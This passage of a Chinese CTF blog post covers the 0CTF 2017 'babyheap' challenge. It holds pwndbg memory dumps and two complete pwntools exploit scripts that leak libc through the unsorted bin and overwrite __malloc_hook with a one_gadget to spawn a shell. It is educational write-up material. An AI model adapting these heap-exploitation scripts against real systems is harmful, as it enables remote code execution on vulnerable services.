<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/30gx &amp;__malloc_hook-0x10</span><br><span class="line">0x7ffff7dd1a90 &lt;_IO_wide_data_0+208&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1aa0 &lt;_IO_wide_data_0+224&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1ab0 &lt;_IO_wide_data_0+240&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1ac0 &lt;_IO_wide_data_0+256&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1ad0 &lt;_IO_wide_data_0+272&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1ae0 &lt;_IO_wide_data_0+288&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1af0 &lt;_IO_wide_data_0+304&gt;:	0x00007ffff7dd0260	0x0000000000000000</span><br><span class="line">0x7ffff7dd1b00 &lt;__memalign_hook&gt;:	0x00007ffff7a92e20	0x00007ffff7a92a00</span><br><span class="line">0x7ffff7dd1b10 &lt;__malloc_hook&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1b20 &lt;main_arena&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1b30 &lt;main_arena+16&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1b40 &lt;main_arena+32&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1b50 &lt;main_arena+48&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1b60 &lt;main_arena+64&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1b70 &lt;main_arena+80&gt;:	0x0000000000000000	0x00005555557571a0</span><br></pre></td></tr></table></figure>

<p><code>__malloc_hook</code>恰好在<code>main_arena - 0x10</code>处。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/10x 0x7ffff7dd1ae0 - 0x3</span><br><span class="line">0x7ffff7dd1add &lt;_IO_wide_data_0+285&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7ffff7dd1aed &lt;_IO_wide_data_0+301&gt;:	0xfff7dd0260000000	0x000000000000007f</span><br><span class="line">0x7ffff7dd1afd:	                        0xfff7a92e20000000	0xfff7a92a0000007f</span><br><span class="line">0x7ffff7dd1b0d &lt;__realloc_hook+5&gt;:	0x000000000000007f 	0x0000000000000000</span><br><span class="line">0x7ffff7dd1b1d:	                        0x0000000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>偏移为0x3c4b78 - (0x7ffff7dd1b70 - 0x7ffff7dd1aed) = 0x3c4aeb</p>
<h3 id="exp1"><a href="#exp1" class="headerlink" title="exp1"></a>exp1</h3><blockquote>
<p>小tips：缩进的tab或空格不能混用，要么全用tab 要么全用空格。okok我今天才第一次遇见</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line">#!usr/bin/python</span><br><span class="line">from pwn import *</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line"></span><br><span class="line">ip = &quot; &quot;</span><br><span class="line">port = 0</span><br><span class="line">io = 0</span><br><span class="line">elf = ELF(&quot;./babyheap_0ctf_2017&quot;)</span><br><span class="line"></span><br><span class="line">def menu(choice):</span><br><span class="line">	io.sendlineafter(&quot;: &quot;, str(choice))</span><br><span class="line">def alloc(size):</span><br><span class="line">	menu(1)</span><br><span class="line">	io.sendlineafter(&quot;: &quot;, str(size))</span><br><span class="line">def fill(idx, size, content):</span><br><span class="line">	menu(2)</span><br><span class="line">	io.sendlineafter(&quot;: &quot;, str(idx))</span><br><span class="line">	io.sendlineafter(&quot;: &quot;, str(size))</span><br><span class="line">	io.sendafter(&quot;: &quot;, content)</span><br><span class="line">def free(idx):</span><br><span class="line">	menu(3)</span><br><span class="line">	io.sendlineafter(&quot;: &quot;, str(idx))</span><br><span class="line">def dump(idx):</span><br><span class="line">	menu(4)</span><br><span class="line">	io.sendlineafter(&quot;: &quot;, str(idx))</span><br><span class="line"></span><br><span class="line">def pwn(ip, port, debug):</span><br><span class="line">	global io</span><br><span class="line">	if(debug == 1):</span><br><span class="line">		io = process(&quot;./babyheap_0ctf_2017&quot;)</span><br><span class="line">		libc = ELF(&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;)</span><br><span class="line">	else:</span><br><span class="line">		io = remote(ip, port)</span><br><span class="line">		libc = ELF(&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;)</span><br><span class="line">	alloc(0x10)		#0</span><br><span class="line">	alloc(0x10)		#1</span><br><span class="line">	alloc(0x10)		#2</span><br><span class="line">	alloc(0x10)		#3</span><br><span class="line">	alloc(0x80)		#4</span><br><span class="line">	free(1)</span><br><span class="line">	free(2)</span><br><span class="line">	payload = p64(0)*3</span><br><span class="line">	payload += p64(0x21)</span><br><span class="line">	payload += p64(0)*3</span><br><span class="line">	payload += p64(0x21)</span><br><span class="line">	payload += p8(0x80)</span><br><span class="line">	fill(0, len(payload), payload)</span><br><span class="line">	payload = p64(0)*3</span><br><span class="line">	payload += p64(0x21)</span><br><span class="line">	fill(3, len(payload), payload)</span><br><span class="line">	alloc(0x10)		#1==&gt; 2</span><br><span class="line">	alloc(0x10)		#2==&gt; 4</span><br><span class="line">	payload = p64(0)*3</span><br><span class="line">	payload += p64(0x91)</span><br><span class="line">	fill(3, len(payload), payload)</span><br><span class="line">	alloc(0x80)</span><br><span class="line">	free(4)</span><br><span class="line">	dump(2)</span><br><span class="line">	io.recvuntil(&quot;\n&quot;)</span><br><span class="line">	libc_base = u64(io.recvuntil(&quot;Command&quot;)[:8].strip().ljust(8, &quot;\x00&quot;))-0x3c4b78</span><br><span class="line">	log.info(&quot;libc_base: &quot;+hex(libc_base))</span><br><span class="line">	</span><br><span class="line">	alloc(0x60)</span><br><span class="line">	free(4)</span><br><span class="line">	 </span><br><span class="line">	payload = p64(libc_base+0x3c4aed)</span><br><span class="line">	fill(2, len(payload), payload)</span><br><span class="line"></span><br><span class="line">	alloc(0x60)</span><br><span class="line">	alloc(0x60)</span><br><span class="line">	one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]</span><br><span class="line">	payload = p8(0)*3</span><br><span class="line">	payload += p64(0)*2</span><br><span class="line">	payload += p64(libc_base + one_gadget[1])</span><br><span class="line">	fill(6, len(payload), payload)</span><br><span class="line">	alloc(233)</span><br><span class="line">	io.interactive()</span><br><span class="line"></span><br><span class="line">if __name__ == &apos;__main__&apos;:</span><br><span class="line">  pwn(&quot;node3.buuoj.cn&quot;, 28315, 1)</span><br></pre></td></tr></table></figure>

<h3 id="分析2"><a href="#分析2" class="headerlink" title="分析2"></a>分析2</h3><ol>
<li>通过unsorted bin的指针来泄露libc_base<br>要打印出指针，就需要使用<code>Dump</code>功能来打印，但是<code>Dump</code>只能打印没有被<code>Free</code>的content<br>想要打印出被free的内容，就可以想到通过打印一个没有被<code>Free</code>的content，但是其中包含了一个被free的chunk，如何实现？ 既然存在堆溢出，当然是通过改写size来达到目的。<br>如图理解<br><img src="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/_GJRBW~UDI64RTJ%60AG%60%60BXW.png" alt><br>显然A B的前后都需要申请chunk，前一个chunk为了造成堆溢出改写A的size位，后一个chunk防止与top chunk合并<br>同时这些chunk的大小都必须是unsorted bin，这样B被free后 fd bk 都指向unsorted_addr，可以得到libc_base</li>
<li>劫持<code>__malloc_hook</code>，通过堆溢出改写fd到<code>__malloc_hook</code>附近地址，连续calloc两次就到附近地址进行写入，写入到<code>__malloc_hook</code>时将该处填写成<code>one_gadget</code>即可。再次Alloc调用calloc时，就会执行<code>__malloc_hook</code>处的<code>one_gadget</code>拿shell了。【这里和我文章fastbin attack中search这个题一样的】</li>
</ol>
<p>好了可以着手写exp了</p>
<h3 id="exp2"><a href="#exp2" class="headerlink" title="exp2"></a>exp2</h3><p>原po说的是exp没有libc限制，其实不然….</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">#ARCH SETTING</span><br><span class="line">context(arch = &apos;amd64&apos; , os = &apos;linux&apos;)</span><br><span class="line">r = process(&apos;./babyheap&apos;)</span><br><span class="line"># r = remote(&apos;127.0.0.1&apos;,9999)</span><br><span class="line"></span><br><span class="line">#FUNCTION DEFINE</span><br><span class="line">def new(size):</span><br><span class="line">   r.recvuntil(&quot;Command: &quot;)</span><br><span class="line">   r.sendline(&quot;1&quot;)</span><br><span class="line">   r.recvuntil(&quot;Size: &quot;)</span><br><span class="line">   r.sendline(str(size))</span><br><span class="line"></span><br><span class="line">def edit(idx,size,content):</span><br><span class="line">   r.recvuntil(&quot;Command: &quot;)</span><br><span class="line">   r.sendline(&quot;2&quot;)</span><br><span class="line">   r.recvuntil(&quot;Index: &quot;)</span><br><span class="line">   r.sendline(str(idx))</span><br><span class="line">   r.recvuntil(&quot;Size: &quot;)</span><br><span class="line">   r.sendline(str(size))</span><br><span class="line">   r.recvuntil(&quot;Content: &quot;)</span><br><span class="line">   r.send(content)</span><br><span class="line"></span><br><span class="line">def delet(idx):</span><br><span class="line">   r.recvuntil(&quot;Command: &quot;)</span><br><span class="line">   r.sendline(&quot;3&quot;)</span><br><span class="line">   r.recvuntil(&quot;Index: &quot;)</span><br><span class="line">   r.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">def echo(idx):</span><br><span class="line">   r.recvuntil(&quot;Command: &quot;)</span><br><span class="line">   r.sendline(&quot;4&quot;)</span><br><span class="line">   r.recvuntil(&quot;Index: &quot;)</span><br><span class="line">   r.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">new(0x90) #idx.0 to unsorted bin</span><br><span class="line">new(0x90) #idx.1 to unsorted bin</span><br><span class="line">new(0x90) #idx.2 to unsorted bin</span><br><span class="line">new(0x90) #idx.3 for protecting top_chunk merge</span><br><span class="line">delet(1)</span><br><span class="line"></span><br><span class="line">payload_expand = &apos;A&apos;*0x90 + p64(0) + p64(0x141)</span><br><span class="line">edit(0,len(payload_expand),payload_expand)</span><br><span class="line"></span><br><span class="line">new(0x130)</span><br><span class="line"></span><br><span class="line">payload_crrct = &apos;A&apos;*0x90 + p64(0) + p64(0xa1)</span><br><span class="line">edit(1,len(payload_crrct),payload_crrct)</span><br><span class="line"></span><br><span class="line">delet(2)</span><br><span class="line"></span><br><span class="line">echo(1)</span><br><span class="line">r.recvuntil(&quot;Content: n&quot;)</span><br><span class="line">r.recv(0x90 + 0x10)</span><br><span class="line">fd = u64( r.recv(8) )</span><br><span class="line">libc_unsort = fd</span><br><span class="line">libc_base = libc_unsort - 0x3c4b78</span><br><span class="line"></span><br><span class="line">new(0x90) #idx.2 clean the heap-bins environment</span><br><span class="line">new(0x10) #idx.4 for overflow</span><br><span class="line">new(0x60) #idx.5 to fastbin[5] </span><br><span class="line">new(0x10) #idx.6 for protecting top_chunk merge</span><br><span class="line">delet(5) #NOTICE: idx.5 recycled after here !!!</span><br><span class="line">malloc_hook_fkchunk = libc_base + 0x3c4aed</span><br><span class="line">payload_hj = &apos;A&apos;*0x10 + p64(0) + p64(0x71) + p64(malloc_hook_fkchunk)</span><br><span class="line">edit(4,len(payload_hj),payload_hj)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">new(0x60) #idx.5</span><br><span class="line">new(0x60) #idx.7</span><br><span class="line">onegadget_addr = libc_base + 0x4526a</span><br><span class="line">payload_hj2onegadget = &apos;A&apos;*3 + p64(0) + p64(0) + p64(onegadget_addr)</span><br><span class="line">edit(7,len(payload_hj2onegadget),payload_hj2onegadget)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">new(0x100)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<hr>
<blockquote>
<p>参考：<br>1<br><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/fastbin_attack-zh/" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/fastbin_attack-zh/</a><br>上述四种attack方法的demo都可以参照ctfwiki中给的 ↑<br><a href="https://juejin.im/entry/5c177e6ff265da6141717bcd" target="_blank" rel="noopener">https://juejin.im/entry/5c177e6ff265da6141717bcd</a><br>search：<br><a href="https://www.twblogs.net/a/5d012568bd9eee14644f97a1/zh-cn" target="_blank" rel="noopener">https://www.twblogs.net/a/5d012568bd9eee14644f97a1/zh-cn</a><br><a href="https://www.gulshansingh.com/posts/9447-ctf-2015-search-engine-writeup/" target="_blank" rel="noopener">https://www.gulshansingh.com/posts/9447-ctf-2015-search-engine-writeup/</a><br><a href="https://bbs.pediy.com/thread-247219-1.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-247219-1.htm</a>       ==&gt;他把两种方法【wiki &amp;&amp; gulshansingh的】都分析了一下<br>veritas🐂有一篇<a href="https://veritas501.space/2018/03/27/%E8%B0%83%E6%95%99pwndbg/" target="_blank" rel="noopener">调教pwndbg的文章</a>可以优化<code>find_fake_fast</code>，不需要设置大小，直接打印出可用的和padding<br>2<br><a href="https://iosmosis.github.io/2019/09/13/babyheap-0ctf-2017/" target="_blank" rel="noopener">https://iosmosis.github.io/2019/09/13/babyheap-0ctf-2017/</a><br><a href="https://nobb.site/2017/08/01/0x36/" target="_blank" rel="noopener">https://nobb.site/2017/08/01/0x36/</a><br><a href="https://www.cnblogs.com/xingzherufeng/p/9844873.html" target="_blank" rel="noopener">https://www.cnblogs.com/xingzherufeng/p/9844873.html</a><br><a href="https://juejin.im/entry/5c177e6ff265da6141717bcd" target="_blank" rel="noopener">https://juejin.im/entry/5c177e6ff265da6141717bcd</a></p>
</blockquote>
  
	  </div>
		  <footer class="article-footer clearfix">
<div class="article-catetags">

<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/笔记/">笔记</a>
</div>


  <div class="article-tags">
  
  <span></span> <a href="/tags/pwn/">pwn</a><a href="/tags/堆/">堆</a><a href="/tags/笔记/">笔记</a>
  </div>

</div>



</footer>

   	       
	  </article>
	  
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2019/11/15/house of/house of roman/" title="house of_系列学习之 house of roman">
  <span>
  house of_系列学习之 house of roman</span>
</a>
</div>


<div class="next">
<a href="/2019/11/01/unsorted bin attack/unsorted bin attack/"  title="Unsorted Bin Attack">
 <span>Unsorted Bin Attack
</span>
</a>
</div>

</nav>

	  

</div> 
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">
<div id="authorInfo">
	
		<div class="author-img"></div>		
	
	<div class="social-info" class="clearfix">
		
		<a href="http://weibo.com/https://weibo.com/u/5213203661?refer_flag=0000015010_&amp;from=feed&amp;loc=nickname" target="_blank" class="icon-weibo" title="微博"></a>
		
		
		<a href="https://github.com/p1Kk" target="_blank" class="icon-github" title="github"></a>
		
		
		
		
		
		
		
		
		
		
		<a href="mailto:p1kk_wang@qq.com" target="_blank" class="icon-email" title="Email Me"></a>
		

	</div>
</div>

  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
		  
			<li><a href="/categories/ACM/" title="ACM">ACM<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/CTF/" title="CTF">CTF<sup>4</sup></a></li>
		  
		
		  
			<li><a href="/categories/oj/" title="oj">oj<sup>20</sup></a></li>
		  
		
		  
			<li><a href="/categories/漏洞复现/" title="漏洞复现">漏洞复现<sup>10</sup></a></li>
		  
		
		  
			<li><a href="/categories/笔记/" title="笔记">笔记<sup>19</sup></a></li>
		  
		
		</ul>
</div>


  
<div class="tagslist">
	<p class="asidetitle">Tags</p>
		<ul class="clearfix">
		
			
				<li><a href="/tags/pwn/" title="pwn">pwn<sup>36</sup></a></li>
			
		
			
				<li><a href="/tags/wp/" title="wp">wp<sup>24</sup></a></li>
			
		
			
				<li><a href="/tags/tw/" title="tw">tw<sup>16</sup></a></li>
			
		
			
				<li><a href="/tags/iot/" title="iot">iot<sup>13</sup></a></li>
			
		
			
				<li><a href="/tags/笔记/" title="笔记">笔记<sup>11</sup></a></li>
			
		
			
				<li><a href="/tags/路由器/" title="路由器">路由器<sup>10</sup></a></li>
			
		
			
				<li><a href="/tags/堆/" title="堆">堆<sup>7</sup></a></li>
			
		
			
				<li><a href="/tags/栈溢出/" title="栈溢出">栈溢出<sup>7</sup></a></li>
			
		
			
				<li><a href="/tags/cve/" title="cve">cve<sup>4</sup></a></li>
			
		
			
				<li><a href="/tags/栈/" title="栈">栈<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/环境搭建/" title="环境搭建">环境搭建<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/攻防世界/" title="攻防世界">攻防世界<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/IO/" title="IO">IO<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/C/" title="C++">C++<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/canary/" title="canary">canary<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/java/" title="java">java<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/HDU/" title="HDU">HDU<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/认证绕过/" title="认证绕过">认证绕过<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/命令执行/" title="命令执行">命令执行<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/命令注入/" title="命令注入">命令注入<sup>1</sup></a></li>
			
		
		</ul>
</div>


  <div class="linkslist">
  <p class="asidetitle">Links</p>
    <ul>
        
          <li>
            
            	<a href="https://whali3n51.github.io" target="_blank" title="whali3n51">whali3n51</a>
            
          </li>
        
    </ul>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	

	<p class="copyright">
	Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/hsihohuang/kiddochan" target="_blank" title="Kiddochan">Kiddochan</a> © 2021 
	
	<a href="/about" target="_blank" title="p1Kk">p1Kk</a>
	
	
	</p>
</div></footer>
    <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/jquery.qrcode-0.12.0.min.js"></script>

<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
  
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else{
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
        
    }
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  c.click(function(){
    ta.css('display', 'block').addClass('fadeIn');
  });
  o.click(function(){
    ta.css('display', 'none');
  });
  $(window).scroll(function(){
    ta.css("top",Math.max(140,320-$(this).scrollTop()));
  });
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina'),
      description = $this.attr('description');
  var html = [
  '<div class="hoverqrcode clearfix"></div>',
  '<a class="overlay" id="qrcode"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="微信"></a>',
  '<a href="http://widget.renren.com/dialog/share?resourceUrl=' + encodedUrl + '&srcUrl=' + encodedUrl + '&title=' + title +'" class="article-share-renren" target="_blank" title="人人"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="微博"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);

  $('.hoverqrcode').hide();

  var myWidth = 0;
  function updatehoverqrcode(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
    var qrsize = myWidth > 1024 ? 200:100;
    var options = {render: 'image', size: qrsize, fill: '#2ca6cb', text: url, radius: 0.5, quiet: 1};
    var p = $('.article-share-qrcode').position();
    $('.hoverqrcode').empty().css('width', qrsize).css('height', qrsize)
                          .css('left', p.left-qrsize/2+20).css('top', p.top-qrsize-10)
                          .qrcode(options);
  };
  $(window).resize(function(){
    $('.hoverqrcode').hide();
  });
  $('.article-share-qrcode').click(function(){
    updatehoverqrcode();
    $('.hoverqrcode').toggle();
  });
  $('.article-share-qrcode').hover(function(){}, function(){
      $('.hoverqrcode').hide();
  });
});   
</script>









<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.article-content').each(function(i){
    $(this).find('img').each(function(){
      if ($(this).parent().hasClass('fancybox')) return;
      var alt = this.alt;
      if (alt) $(this).after('<span class="caption">' + alt + '</span>');
      $(this).wrap('<a href="' + this.src + '" title="' + alt + '" class="fancybox"></a>');
    });
    $(this).find('.fancybox').each(function(){
      $(this).attr('rel', 'article' + i);
    });
  });
  if($.fancybox){
    $('.fancybox').fancybox();
  }
}); 
</script>



<!-- Analytics Begin -->





<!-- Analytics End -->

<!-- Totop Begin -->

	<div id="totop">
	<a title="Back to Top"><img src="/img/scrollup.png"/></a>
	</div>
	<script src="/js/totop.js"></script>

<!-- Totop End -->

<!-- MathJax Begin -->
<!-- mathjax config similar to math.stackexchange -->


<!-- MathJax End -->

<!-- Tiny_search Begin -->

<!-- Tiny_search End -->

  </body>
</html>
